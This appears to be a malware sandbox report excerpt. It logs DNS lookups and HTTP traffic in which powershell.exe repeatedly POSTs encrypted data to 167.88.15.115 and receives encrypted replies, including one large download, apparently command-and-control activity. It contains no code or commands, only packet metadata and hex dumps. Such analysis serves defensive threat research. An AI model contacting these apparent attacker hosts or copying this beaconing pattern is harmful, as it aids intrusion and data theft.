Aug 28, 2021 00:04:24.823965073 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:04:24.875444889 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 28, 2021 00:04:55.038996935 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:04:55.110557079 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:10.381659985 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:10.406232119 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:10.410664082 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:10.435657024 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:11.403597116 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:11.403708935 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:11.425546885 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:11.435739994 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:12.450503111 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:12.450740099 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:12.471882105 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:12.481950998 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:14.497730017 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:14.497997999 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:14.527650118 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:14.548506975 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:18.544784069 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:18.544809103 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:18.566147089 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:18.566191912 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 28, 2021 00:05:39.839868069 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:05:39.877147913 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 28, 2021 00:06:24.791934967 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 28, 2021 00:06:24.824637890 CEST	53	60831	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

167.88.15.115

5.254.118.226

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49714	167.88.15.115	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:05:53.892266035 CEST	1476	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 401 Connection: Keep-Alive
Aug 28, 2021 00:05:54.014910936 CEST	1477	OUT	Data Raw: b8 1e b1 2d 05 6f 95 c4 2c 20 c7 33 e0 f8 b0 93 a1 54 ea e8 eb a2 01 71 21 12 bc 1f 74 c6 48 c9 4b 8c e0 90 20 32 20 bc 93 1a e4 6a cf 06 d3 40 48 81 69 82 fe 06 5b 17 1d 40 0d f1 b1 77 50 64 d7 fc e6 54 19 20 73 70 35 2f 55 d2 bc 96 a1 1c 3e 7d Data Ascii: -o, 3Tq!tHK 2 j@Hi[@wPdT sp5/U>}^F2t&-'(NY4\3#NJ$9<WexuKJH+-c9DjN3:c;Fj$Rh.JAH*a\g<>wbLK\')1E
Aug 28, 2021 00:05:54.431802034 CEST	1477	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 247 Connection: keep-alive Data Raw: aa d8 79 6f d2 dc ad df d5 59 ca 5b 3b 2a 6d 88 a5 d1 c5 3b 0a 39 8f 29 90 1f 99 a1 9f 09 94 ea 55 ed 71 57 b1 04 fe 4c be 47 72 b3 d4 4b 0f cf bc c6 e2 3d 71 a3 cb 1a ce d2 d6 68 65 4b db 6e 0e 22 1b 0b 68 72 44 df 30 94 7e b9 f9 18 f4 50 15 1b 2d 47 eb 0b f5 4e 41 d8 fb 11 9b 28 47 62 2b 71 01 f3 08 10 f3 57 c5 1f 2a d4 8c 68 9f 36 6e a0 32 81 c7 55 bf 29 fe fd 90 1d ab ac ec 6d 3a fe ea c3 76 d9 ce 6c 5d f3 64 ba bc 61 41 4f 91 65 31 61 c5 77 b0 f0 ea 7e a8 58 42 d7 0d b6 7e 51 0f fb 8b ad 3e 67 1b 81 71 0c a4 4a 6b aa ab ff 4c 33 3e 76 26 59 ad 5e 9e 86 29 28 26 48 28 a7 31 70 4b 50 bd 3d b7 9e ba cb a5 18 51 8c ee c2 41 bb 03 d0 00 42 e4 f1 71 b3 9b 76 7d 09 a7 f3 99 8a 31 71 93 81 84 14 ee f4 a3 86 76 26 58 a6 4d 19 e1 36 81 Data Ascii: yoY[;m;9)UqWLGrK=qheKn"hrD0~P-GNA(Gb+qWh6n2U)m:vl]daAOe1aw~XB~Q>gqJkL3>v&Y^)(&H(1pKP=QABqv}1qv&XM6
Aug 28, 2021 00:05:54.439321041 CEST	1477	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 259
Aug 28, 2021 00:05:54.562386036 CEST	1478	OUT	Data Raw: 39 76 72 24 0a 85 02 71 df 1e d4 3c 75 db 4d 83 c5 23 b8 96 20 15 19 0e 00 c6 1f aa a8 c0 16 a3 09 d5 fd 1c 1d 12 7d 00 28 c3 db 62 e4 0d a4 70 ac 61 5d c4 f6 81 5c 79 72 46 a9 44 d4 69 55 6e 9c 02 e0 59 53 d9 7d c6 25 53 73 0e 86 27 9c 9f 64 4e Data Ascii: 9vr$q<uM# }(bpa]\yrFDiUnYS}%Ss'dN>h="I<;+w 8;{Wml1Q1.n'v~xd1g')/>]I[yL.liIucK!blQmw:$MayJP$$
Aug 28, 2021 00:05:54.955670118 CEST	1478	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 324 Connection: keep-alive Data Raw: 5a e1 99 f4 90 70 ec f1 ea 06 e0 8c bf 09 13 d4 0f 9b dc bb 3c 50 e6 63 8d 3d da 50 39 78 39 9e 0f 2a 5c ef 9b 70 4a e5 b4 c0 ec 36 02 12 dc 3f 6d 57 93 db 05 b7 04 23 68 58 62 c0 01 0e a9 9c c2 af 39 b8 d8 f8 7d 96 d2 b1 c5 c3 0d 30 8f 30 62 91 d4 5f 9d 05 ef 39 1a 6a 13 55 9d 7c 60 18 5a b0 fe 08 c9 be 2c 04 5e 67 9a 14 40 8e 7d 25 d5 ea 8e ba 2e 85 45 3c ee a5 08 4d 47 d0 85 f6 b4 b6 0b e9 82 a7 57 69 a1 f5 85 d6 08 c9 8b c4 d8 a7 b2 1c 96 95 5a 8d e8 60 38 95 1e 16 e1 2b cd 52 ab 10 6e f2 43 40 a5 f2 e8 df 7d 05 86 14 90 b3 73 1b 77 be b1 57 63 f4 84 d1 19 82 7d ed 80 87 c9 f1 e3 36 63 73 f0 4a 30 5b ee 24 b4 1e fe 56 c5 76 48 9a 7a 9d a6 91 88 ed 85 6c cf e6 25 6d b8 5c 25 c8 e0 db f5 7a 86 88 68 05 f9 79 fe 43 69 00 97 fa 36 4a 3b e7 f0 7e a5 be f4 26 ba 1c 2d d6 dd c9 63 46 54 b1 fb 3a 33 9d fc c9 85 6e 37 a3 8f fa 39 6a fb 45 3b 3a 25 34 79 d3 4d fb 14 19 10 a8 04 b5 91 9f 6b ad 6c 30 20 10 b6 70 31 40 a0 50 32 47 f0 0f b7 88 b1 a0 b7 5f 49 40 40 1c Data Ascii: Zp<Pc=P9x9*\pJ6?mW#hXb9}00b_9jU\|`Z,^g@}%.E<MGWiZ`8+RnC@}swWc}6csJ0[$VvHzl%m\%zhyCi6J;~&-cFT:3n79jE;:%4yMkl0 p1@P2G_I@@
Aug 28, 2021 00:05:55.070502043 CEST	1478	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 304
Aug 28, 2021 00:05:55.196311951 CEST	1479	OUT	Data Raw: 99 f5 65 d1 12 59 6e 35 84 c7 e3 ab 7e 07 45 b1 9c f3 16 4a 0a 8d 6d 23 8e 23 82 4f 57 86 43 79 6d 54 89 5b b5 f1 7a 79 22 0d 2f a0 69 7d 8c 69 fd 8e 8c 93 c7 c5 19 0c 88 42 44 ed d6 20 dc fd 84 6b 3e 2b 7d 00 0e 85 f2 f0 bb 88 f8 c3 b4 f9 db 8a Data Ascii: eYn5~EJm##OWCymT[zy"/i}iBD k>+}Rn]$J\|facD7g+!Mt0P`N.wFID'"Z62G=,<CIREL.RkLr+EErVa:z}`m75s>1l"^+?pERhU"?j
Aug 28, 2021 00:05:55.590168953 CEST	1479	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 231 Connection: keep-alive Data Raw: 17 85 f9 5f 08 82 88 21 46 4b 08 69 9c cd 50 c7 bf 87 2c d1 5e 91 e5 64 17 1e b8 35 e0 fd c4 48 bf d6 c2 3c 2b cb 00 14 27 b0 28 ca 15 93 e8 9a ed a9 81 5c 6c 41 f8 8c 20 b2 97 68 d2 46 22 1e f9 9c e8 b6 2f c8 35 b7 88 d2 39 37 34 7c 06 00 29 4e 5b 0a ef f5 16 32 5a 34 eb 0e 4f 3e 4c 5a 9b 16 73 fe 0b 3c cf 16 4a 6c a1 cd df 62 97 5d 84 4e 58 c4 16 7b 05 5b 25 b4 8d e4 e8 25 3d 86 6d 19 01 a6 8c ba 64 de 7c bd c1 c5 26 66 e6 79 6f cb 03 60 15 73 60 2d 84 24 e1 18 d2 55 2f 73 34 c5 72 b1 54 a9 40 ec 8b ce 10 76 32 6f 3c 11 77 c5 86 04 31 ef 5d aa 2b 6f 54 ee 2d ee 12 0a c5 34 8a 89 23 57 a8 d8 0d 61 b5 60 cf d7 d6 36 fa 2b 96 d1 31 e1 e8 21 05 94 51 67 e7 4f e5 36 4e a3 52 52 ac 6e 97 Data Ascii: _!FKiP,^d5H<+'(\lA hF"/5974\|)N[2Z4O>LZs<Jlb]NX{[%%=md\|&fyo`s`-$U/s4rT@v2o<w1]+oT-4#Wa`6+1!QgO6NRRn
Aug 28, 2021 00:05:55.592959881 CEST	1479	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 677
Aug 28, 2021 00:05:55.716187000 CEST	1480	OUT	Data Raw: 9d 46 b2 57 09 35 40 16 fd 5b c1 65 4c cf 89 27 b0 0f 7d 99 c7 5a 82 92 da 43 66 fd 23 35 bf 1a 8f 55 83 47 8e d4 4b 0b 98 f7 f3 cf a3 28 22 b1 f6 c9 b0 53 62 ae 36 43 c2 21 7b c5 ce 41 f2 c8 9b a7 d4 f6 4d 43 97 da c2 73 01 ce 66 b2 ed b2 21 b3 Data Ascii: FW5@[eL'}ZCf#5UGK("Sb6C!{AMCsf!Yl @mZ;X+4R+e2f2:D/+=9;~`OS'3bt; j^RXTS?hsR'K\`Uy^ [-*3T8Q4d{<MWeS:h)Rh
Aug 28, 2021 00:05:56.103768110 CEST	1482	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 56680 Connection: keep-alive Data Raw: 83 3d bb 63 7e 15 c2 7a 91 8e 29 51 ed 08 21 54 78 54 76 02 a1 e4 62 a2 07 3a 41 6d ea d9 11 b3 45 68 07 86 c0 6d 01 eb 97 36 ab 55 5d c6 f4 b6 f7 60 cd fa 2c bc 50 c7 c2 34 c8 4e 7f a6 d7 31 a4 6f 49 2d c0 dc e7 dd 6e 41 54 4d c0 3e 45 b0 fc 5d 1f 1c 1c 9b a5 ad fb ce 2e 59 88 2b 71 68 56 3f 95 77 6c 42 89 01 b0 06 64 0a 47 6f cc 0d 16 33 16 87 8a 37 46 1f 22 2a 9b 39 5e aa 95 a5 d1 78 f9 d1 3f ae a1 e3 05 8f a9 e3 54 8e dd b9 21 89 42 1c ee 6c aa 00 1c 24 0d bb 6f a5 7d a6 12 3e 54 cb 45 22 e7 b3 33 ac 4b 4f c4 20 66 fb c9 62 3d 98 a7 f4 a4 db 17 19 f2 19 50 c8 d4 52 c6 f8 41 0b 11 b7 ce 99 cb c7 f5 78 ac 6a 42 df fc f8 ea c6 bd f2 01 23 14 0c d6 7b df a4 ac 96 d9 62 f6 af c7 42 94 f1 6d 5f fc 06 52 47 e0 96 8d 50 75 e4 9c 59 ac db 2d bb 25 ab 4d 6c 93 46 6c aa 6f a6 77 62 a8 53 26 6b 61 2f 17 3e bc fb c2 83 da 04 a2 9d 91 95 cb e6 6c d1 a0 4d 0f 90 89 aa ef 32 9b 3b ae 75 17 75 b7 b5 fa e8 bf 7a 03 fe 0c 89 d8 1a f2 5b 90 24 4c 2f a3 96 bf 05 a8 82 8e 6d 7e 1d e9 e8 70 7a 35 bd e1 4c 8e 01 19 06 9a 60 e6 19 0f 95 72 b5 c6 ed 8a 59 25 66 03 14 3b a9 7f 41 91 f7 74 88 66 d6 3a b4 83 6d 59 ea 69 e0 2b 82 b6 c6 94 99 cb b9 d3 4d 66 44 d7 84 75 00 07 c9 bc e8 54 53 b1 08 bf db 3d cd b1 8e 1d 00 f6 3d 37 06 77 f8 c5 94 5c 19 23 c1 fb 3e 28 91 98 ef 4c e1 65 c9 12 39 bd 4e 73 f5 e5 0e 02 89 5c af 19 07 f0 0e ba d5 26 a6 47 f5 db bb a9 4e 3f d3 03 61 30 ba bd 7f 4d f0 c6 51 ac b2 b6 89 c9 7f d3 77 ba 7a 3b 3c 56 b9 b8 66 e2 fb 92 b6 f8 91 38 d5 99 4c 2c 4b 12 9f e7 e5 17 4d 18 ea 62 a2 73 7d 03 0a 4e 6d ea 4c b4 7a 38 35 c4 71 ed bc cb 36 cb fc a4 43 c4 71 b3 cb e5 49 f6 e3 83 a1 fe 60 46 0f fb 65 47 75 82 6b 74 68 a5 76 35 00 8f d0 87 aa 3d 04 11 14 8f ee 9f 14 76 ee 8a 2d f6 1b 4c cd f9 ff d7 51 7d 5a 0c 1d 4c a8 ca 2d b2 97 d9 54 3c 2e 95 65 29 64 97 6d 1a 00 3e bd 17 c9 09 f7 9f c2 a6 b1 ca c9 9b 75 54 dc a1 11 58 10 fb a6 0e fb a5 03 7b 22 05 70 ef 13 a1 c7 4d 32 fb bc 9c 6f e8 b6 7d de d5 2f 3a 2a 36 4b 9f d0 aa 51 48 11 7b ed ca b6 00 a3 b4 98 ba dd 76 04 85 6e 9b 20 31 6d 5d 18 74 65 14 f1 f2 57 e2 8d 97 d2 48 05 87 cc 28 ad e0 a0 05 f8 4e 15 e3 e4 46 eb 85 6c 54 e0 ae 7c 74 ed 8f 74 e5 5e c4 cc 31 a3 df f1 39 06 da 00 40 67 9c 4e e1 dd 83 79 91 28 e7 5e 9e eb 31 f5 a2 9a 82 30 29 5c af 8a fe 1f a3 77 9a 61 ec 38 64 6a 19 07 92 e3 47 07 31 4b 02 32 5f 7a 62 86 5d da 07 d8 23 b9 5d 71 7c 36 6d b2 93 b5 ad 66 af ed 54 19 07 79 e7 40 78 17 b3 81 b7 7e 13 37 c8 29 22 5e c0 a7 02 00 8b b7 b0 da 9e 3a ce 3e a0 e2 54 90 a4 6e 9b 7c bb 5b b6 11 03 47 71 2d 37 c8 18 7d a0 9b 25 99 c5 3e ff 2b 17 aa 5d 97 5b c2 52 cd c5 58 03 fa 81 56 c9 5c 16 55 33 ca 03 59 38 18 1a e2 07 6d 4c 7f ce d6 c6 51 91 3a 14 30 1d bc 0d 0f 17 1f 94 94 fb bc 16 4a 05 71 6a ef a2 33 19 74 dc 41 9a 2b 8b c5 6e 82 2d 91 59 0d 56 0e e9 75 c3 92 33 d8 e1 c8 ed 96 17 40 b6 16 e3 94 d6 62 31 54 fc 84 ca e5 8e dc ba 76 fc fa e3 9d 2c 32 34 e9 f8 45 fb c2 0b af 92 7a d4 8f e0 76 fe 91 70 7a 05 a3 cd a0 c8 7d 5d f8 17 9a f8 16 03 dd a8 8f a9 43 5c 6a f4 9b 6a 2c c0 bf af d5 21 15 c7 c8 b4 a7 a4 13 5b 04 2e 4d 8f f7 be 4f 7a a3 10 d0 4e 85 06 25 43 0f a7 c8 6b a5 5e 10 c5 fa 61 be ad b7 cd 6f bb dd 30 35 f8 9d 18 93 fc 27 bd 0b e9 73 5c 35 44 cc 25 0b d0 30 9c 5e f7 0e cb af d7 ee 30 bf a2 a7 59 73 8e d4 fc c2 16 9c ba de 3f 2e 46 b2 f2 d2 53 26 7a 3f 1d 75 1f c7 0a e7 57 c2 e6 58 fe 64 85 ae 5d 6e 84 ad 4f 53 ec 2a 37 3f 4b 49 98 68 e0 f2 64 11 99 fa 55 5d 6f b8 b1 e2 bc 41 c2 96 e5 f5 e1 55 57 77 db 7d d5 e9 e6 b9 97 53 bb ed 0b ed 36 b0 1a f3 38 5a b2 d3 4e be d8 64 8b d9 e1 2f 39 2f 46 f5 99 05 2d 80 a1 a3 b7 4f 30 70 cd 36 8b a2 5a 77 1c 0a da 20 e3 8f d9 24 8b 82 8b 05 8c 00 80 49 2e 8f 17 73 3f 1b 86 67 90 4e 69 b4 20 5c 7e 66 95 63 f4 46 86 94 33 17 da 1e 87 e1 Data Ascii: =c~z)Q!TxTvb:AmEhm6U]`,P4N1oI-nATM>E].Y+qhV?wlBdGo37F"9^x?T!Bl$o}>TE"3KO fb=PRAxjB#{bBm_RGPuY-%MlFlowbS&ka/>lM2;uuz[$L/m~pz5L`rY%f;Atf:mYi+MfDuTS==7w\#>(Le9Ns\&GN?a0MQwz;<Vf8L,KMbs}NmLz85q6CqI`FeGukthv5=v-LQ}ZL-T<.e)dm>uTX{"pM2o}/:6KQH{vn 1m]teWH(NFlT\|tt^19@gNy(^10)\wa8djG1K2_zb]#]q\|6mfTy@x~7)"^:>Tn\|[Gq-7}%>+][RXV\U3Y8mLQ:0Jqj3tA+n-YVu3@b1Tv,24Ezvpz}]C\jj,![.MOzN%Ck^ao05's\5D%0^0Ys?.FS&z?uWXd]nOS*7?KIhdU]oAUWw}S68ZNd/9/F-O0p6Zw $I.s?gNi \~fcF3
Aug 28, 2021 00:05:56.103898048 CEST	1483	IN	Data Raw: 67 0f 68 df 27 ad 00 80 bb cf dd e9 e2 76 9b d0 b7 9e 16 28 82 79 5e 96 08 5c 54 8f ce e5 ee 36 17 a6 e5 91 19 d5 37 c7 0b 4b b6 bc 07 a0 ea b8 49 2c 28 c3 09 53 c7 f9 d5 f6 18 7a 27 4d 4e 55 f7 c6 c6 4e 9a 91 dd d7 40 b8 5c d1 3f 1c 76 42 09 7d Data Ascii: gh'v(y^\T67KI,(Sz'MNUN@\?vB}"C*Cih}UapKp"$9"8"QNrY<G^b)zj~=JFLm4EorB\|M9J&- $A4N=E
Aug 28, 2021 00:05:56.103938103 CEST	1485	IN	Data Raw: 91 9a 10 3a 91 77 3f 86 7d 88 22 5c 55 48 03 95 eb 94 f4 66 a7 4d fc 0c fe d1 07 27 3d b2 b6 30 a7 7e 4b a6 07 eb 9e ae 1c 26 bf 0a 9c c6 de 4f f9 a1 61 82 9c 1b 2c 21 df 09 b7 89 2d 39 3c 6e c0 fc f7 33 8c b8 08 34 6a 0a f0 b4 48 b1 fc 6c ad 72 Data Ascii: :w?}"\UHfM'=0~K&Oa,!-9<n34jHlru=.BTNE{jiACBI~zNlIS/Ue+;[2^]m?(\|yXlu7,40WP{rqehQ=zxgwR1n8*pPT
Aug 28, 2021 00:05:56.103975058 CEST	1486	IN	Data Raw: 20 c9 a3 1e 3a 6b c4 dc 8f 7d a0 cd 50 57 8f ab 75 4f 27 9c c0 2f 7f be f5 23 e0 7d 85 f6 87 8e 41 e4 1d 6a d7 94 63 0b 80 a1 4c 11 93 54 1e 4b 4d 09 4c 6d fa 6c fc db b5 60 d1 e7 28 6f 7a ea e1 20 34 9c 5f 7e 16 6f b2 25 0f d3 ff c4 e9 4d 26 2e Data Ascii: :k}PWuO'/#}AjcLTKMLml`(oz 4_~o%M&.P19)[pZ^LLHNqsTM6cykl5e}HB+qkeE>xzvaj}EqRA];+)~!yT}W)t+72dvMB"s]h[dP]L
Aug 28, 2021 00:05:56.104013920 CEST	1488	IN	Data Raw: 9d b3 52 a6 ef 65 97 16 a0 d4 85 d4 fc 21 f0 5c b9 c5 fc 37 c6 6d 03 a4 dc d4 c8 fa d9 c6 09 80 e6 f7 d8 d5 a8 f6 5c d7 f5 b3 64 67 85 68 f4 b5 c7 bd 13 bf 90 c4 92 12 c2 32 d8 38 e2 c8 ec 8b be 40 79 b9 69 6d 0d 87 f2 8d 5a a0 d2 e7 9c b3 b2 d7 Data Ascii: Re!\7m\dgh28@yimZ*i%UmcsGrZ:5RiHvP776?<7\]GbT]~3bjUh3A@eD% JukpKp,UN?jNBl' v`)6l
Aug 28, 2021 00:05:56.104073048 CEST	1489	IN	Data Raw: 25 92 45 d5 77 c1 48 cc ec f4 37 aa e3 ca 2a ec 86 0d 35 45 10 a4 60 f2 2e 37 86 92 36 53 2a d8 1d 1e d7 ac 68 c0 18 62 03 f6 6a b2 21 3f cc 57 45 61 1a 11 63 0b cb d5 62 ea 07 2d d0 fa 04 07 ad 6b f7 fb c2 48 5f 4e d0 3b 47 2b 90 ce da e5 66 99 Data Ascii: %EwH75E`.76Shbj!?WEacb-kH_N;G+f2n\|bc/X^1,^y9PR\|.9q#~HI)<y*zpb($UcK"P +]N$=p8(T(GKa:R\|wF&Z(4Tt{DDE
Aug 28, 2021 00:05:56.104100943 CEST	1489	IN	Data Raw: 02 77 de d0 d9 4d 7d 2d 47 2d e8 1b 08 98 31 bb fe c2 04 82 4f c8 f4 ca 76 9c 4b c0 7e 99 bd 52 ab e4 1b 04 e6 2f 7f 92 f6 4d 2a 5a 97 f1 c3 01 ec 5a 13 37 02 6f ec 53 1b 5f 79 9e ae e6 4e e8 6e f7 18 55 2c a2 e7 24 a2 f8 42 32 a9 48 ba 93 12 af Data Ascii: wM}-G-1OvK~R/MZZ7oS_yNnU,$B2H&_ndt-cV2}4(kv.m-+7\Njp;\@KERmZ3>d@BVz
Aug 28, 2021 00:05:56.104136944 CEST	1491	IN	Data Raw: 5e 61 8c 01 c8 77 36 cf 63 f3 fa 98 e8 ab 5b a6 ac 35 62 67 aa ad f8 46 81 e8 e6 b8 cc 0c 0d 1e 17 6e 71 b6 78 40 d5 36 ea 86 ff eb da 04 a4 d4 f7 6f 85 ce d4 60 cd 94 2a 7c 46 0b 87 94 d5 06 b4 6d d7 6b 3d c7 89 4b c0 fd 9a 86 b3 9a 40 34 e2 2a Data Ascii: ^aw6c[5bgFnqx@6o`\|Fmk=K@4M%&p$nXL$+ex:9i3g"i+rJs($XJCC">Jy/cs*Jq)&iq;wX0XqV<?
Aug 28, 2021 00:05:56.104173899 CEST	1492	IN	Data Raw: 43 fd cb f1 8e fd c5 4a f8 9d 40 77 f0 54 a7 1f f8 ea 1c bb 96 ef b0 e5 fe 73 91 81 0f f1 df 5b 5e 62 04 94 15 98 89 4e 48 f5 97 e2 3c 09 34 25 1e 49 9f 5a 52 3d 94 52 60 11 ff 3a 99 39 a4 f2 ad 78 31 07 3f 2b 51 58 5e 34 50 6d 5f 6b 0d b5 b7 bb Data Ascii: CJ@wTs[^bNH<4%IZR=R`:9x1?+QX^4Pm_k`D;f]Ljy-mKiah2l1#<WaE%8TMS X.33>`Qm[HL 3)t3p/ ~#IP&Gr.J%-(/rME
Aug 28, 2021 00:05:56.104222059 CEST	1493	IN	Data Raw: 56 85 9b 74 a3 cc 26 7d 83 49 eb 27 4a 92 13 89 cc 03 5a 4f fc 85 68 5c 53 a6 2a 4c c9 59 ac 98 33 5b 4a 56 bc 5d 65 c9 a2 91 ba c7 80 e6 d5 f0 a2 3c 21 8e a3 db 5b c4 9e 51 fa 2a d1 e8 0e 99 2d 02 9e 25 f1 df 61 f1 25 e7 90 fd b5 71 39 f4 45 ce Data Ascii: Vt&}I'JZOh\SLY3[JV]e<![Q-%a%q9E7b=g=3+i1Oe'ifj l)nvHn[6ms~,'&z]m-Y9bPHKeKWSZ `XfM$?$b9G!kC-
Aug 28, 2021 00:05:56.228257895 CEST	1522	IN	Data Raw: 4d 2e 33 05 bd 6b c7 89 11 33 14 e5 ef 13 f5 50 d6 8a 9d 29 be ac 0f ae 08 fa 98 f5 98 d3 64 89 fa f2 c1 3f 9f 75 b6 15 02 80 60 23 20 3a 46 81 51 7a f7 c8 7c 8c 1b 99 60 75 b6 de 93 bb d8 91 4a 82 5c d5 ac a6 db d3 e6 bf 56 c7 11 f6 da 05 5e b9 Data Ascii: M.3k3P)d?u`# :FQz\|`uJ\V^
Aug 28, 2021 00:06:40.022618055 CEST	6380	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 340
Aug 28, 2021 00:06:40.148077965 CEST	6381	OUT	Data Raw: 45 73 a9 a5 c0 95 72 ed 16 7d 51 c6 61 fe 60 24 6b 43 a7 fc c2 bd f4 76 70 eb b0 75 7a 63 f1 77 59 33 5b e1 37 3b de 5c 3b 46 0a f8 7e 44 81 1f 9c ae ec 4d 84 c1 89 87 7d 33 35 d3 e4 fb 74 b1 8b d9 6d 2e a4 7e eb 30 63 4b c2 7d b3 fa f6 2d 6b 92 Data Ascii: Esr}Qa`$kCvpuzcwY3[7;\;F~DM}35tm.~0cK}-kvdw>WnSz9;iS$<X\TV%)0TR'%N,fqoM4<@WYwp_b<;}[uHTLU9@
Aug 28, 2021 00:06:40.539211988 CEST	6381	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 163 Connection: keep-alive Data Raw: d4 b5 3c 55 4c c1 7e 24 81 22 37 35 c1 97 7a 71 f5 0f 67 23 89 0a 5d 46 7d 55 b0 d9 8f f0 08 59 e9 de 64 65 97 ba 2c 07 bf d4 41 50 16 f9 57 3d 3d e7 c5 9a 7d eb 9f 90 9f fa 53 6a df 63 b3 83 86 09 26 1f 6f c3 4c e4 5d 44 c4 cf 94 08 bd ec 03 46 00 9d ff bb 41 0f 4b ab b8 9f 41 e6 32 44 85 bd 87 2d e5 db 9f 2c 8d f8 88 3d e4 c5 53 f1 a8 7a e0 41 16 82 5a 14 55 e2 46 97 01 67 ba e3 e3 d2 d7 76 a5 07 81 a1 82 07 cf 3d 3a 77 f1 25 b5 92 ae aa e2 64 8f 03 a3 ae 89 98 ec 22 75 15 04 48 36 Data Ascii: <UL~$"75zqg#]F}UYde,APW==}Sjc&oL]DFAKA2D-,=SzAZUFgv=:w%d"uH6
Aug 28, 2021 00:06:40.649377108 CEST	6381	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 444
Aug 28, 2021 00:06:40.776309967 CEST	6382	OUT	Data Raw: 8b 0b 7a 19 d6 86 15 ca 58 25 5e 26 dd d0 c5 8f d7 e1 5d 13 60 d1 35 a7 91 69 12 f2 48 6c 1f ef d9 03 78 67 32 83 0b b9 d6 c0 e9 01 37 e4 a0 e4 48 90 3b e2 8d e0 09 b8 d4 d1 86 6e 75 22 83 eb 07 6e 4b db 59 5f 5e 55 d7 a3 3b 9f e7 35 71 ab c7 2c Data Ascii: zX%^&]`5iHlxg27H;nu"nKY_^U;5q,1;c_D>2i`IuSX<_a<K0xR"ArC.G4"dFoR7EcD!R`0HYTR-P0EOyJH>IBef7s0
Aug 28, 2021 00:06:41.168416977 CEST	6382	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 217 Connection: keep-alive Data Raw: b7 35 93 fe f8 0e a6 dc bf bf 87 40 f3 6f c1 e6 38 fc 86 39 7b 21 9f 96 98 74 96 5f 82 0b 13 e5 83 99 d3 57 31 3f 84 5b f3 cc 30 be 1e 1e ee fe 18 b4 6c 72 5a a6 c7 b3 52 67 41 e9 88 79 b2 3b 28 d8 a0 29 3a 91 da 51 3b 76 b6 43 55 53 78 a7 ea 88 6f da 18 2d 0e 0d d1 57 a0 1d e2 1f 77 3e 72 c9 85 90 a3 f3 20 e1 0f d6 ff af 20 0d 6d 6c fe 7f d3 17 de 98 39 81 f9 4e 0d 74 1a b8 cd c2 81 d3 eb 18 7e 9c 4a 87 00 a1 0a 99 3e 63 2e 8c f0 9d 90 bd 6b bc 69 3c 87 b9 c3 02 2c 17 e5 65 81 47 21 3b 91 7d 24 64 48 b2 19 e6 ca cf ac 05 1a df 80 4e 21 68 4b 66 0f 29 9b b4 d6 52 82 35 90 de 6b f8 60 23 cf d2 4e 0c 3d 52 63 54 ff cb 07 8c c4 35 92 3b 98 e9 ae Data Ascii: 5@o89{!t_W1?[0lrZRgAy;():Q;vCUSxo-Ww>r ml9Nt~J>c.ki<,eG!;}$dHN!hKf)R5k`#N=RcT5;
Aug 28, 2021 00:06:41.272767067 CEST	6382	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 301
Aug 28, 2021 00:06:41.395565987 CEST	6383	OUT	Data Raw: f8 47 1f 37 10 a9 9d c1 fc e9 0a b7 9e 53 4c 6a a9 3c 82 f5 aa 24 1f 79 36 76 73 8d 39 a0 b6 3e a5 9a d6 fe 96 3e f4 a2 a3 b7 7e 9c b5 ce 85 cb e2 f9 64 b1 66 94 76 d5 29 a5 02 99 37 10 89 5d 33 ca 00 d4 1d b8 b6 64 00 59 cb f6 1c 78 a1 34 ac 17 Data Ascii: G7SLj<$y6vs9>>~dfv)7]3dYx4kwj\n'Nb_G@ &.\|<W4B.c,8;mrW/"#M'%Ot9::Jd;}S=6)iCR{ta8'U-wuXo
